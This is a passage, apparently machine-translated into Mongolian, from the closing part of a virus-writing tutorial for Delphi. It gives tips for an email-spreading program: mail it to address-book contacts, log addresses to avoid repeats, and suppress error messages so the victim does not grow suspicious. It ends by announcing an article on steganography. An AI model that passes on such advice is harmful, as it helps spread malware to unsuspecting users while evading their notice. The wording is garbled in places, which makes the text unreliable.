pricol.exe - холболтыг нэн даруй шалгана уу. Хэрэглэгч цахим шуудангаа шалгаж байж магадгүй. Энэ нь бидний мэдээллийн товхимол авах боломжийг ихээхэн нэмэгдүүлэх болно. Та өөрөө хоёр дахь заль мэхийг аль хэдийн олж мэдсэн,
тухайлбал, миний тайлбарласан хувилбарт та хаягийн дэвтэрээс устгаагүй тул нэг хэрэглэгч рүү үргэлж ижил захидал илгээх болно. Тиймээс бүх боловсруулсан хаягийг бүртгэлийн файлд бичиж, байнга шалгаж байгаарай. Тийм л байх шиг байна. Хэдийгээр үгүй. try..except-д алдаа гаргах магадлалтай кодын хэсгүүдийг хавсаргахаа бүү мартаарай. Түлхүүрийг ($D-) тавь. Учир нь хэрэв хэрэглэгч гэнэт "FUCK" нь бүхэл тоо хүчин төгөлдөр бус байна" гэх мэт алдаа гарвал тэр ямар нэг зүйлийг сэжиглэх болно.

ДҮГНЭЛТ

Энэ сүүлчийн нийтлэл нь Windows 9x-д дибаг хийсэн вирусуудын тухай юм. Би саяхан боолтыг форматлаж, WindowsXP Professional суулгасан тул дараах жишээнүүд үүнд зориулагдсан болно. Та Delphi 7-г аажмаар худалдаж авах боломжтой, учир нь би зургаа дахь хэсгийг нь хаа нэгтээ тарьсан, одоо би бүрэн нүцгэн сууж байна :) Би долоо дахь хэсгийг нь худалдаж авах болно 😉

Дараагийн өгүүллийг стеганографи, түүний практик хэрэгжилтэд зориулах байх.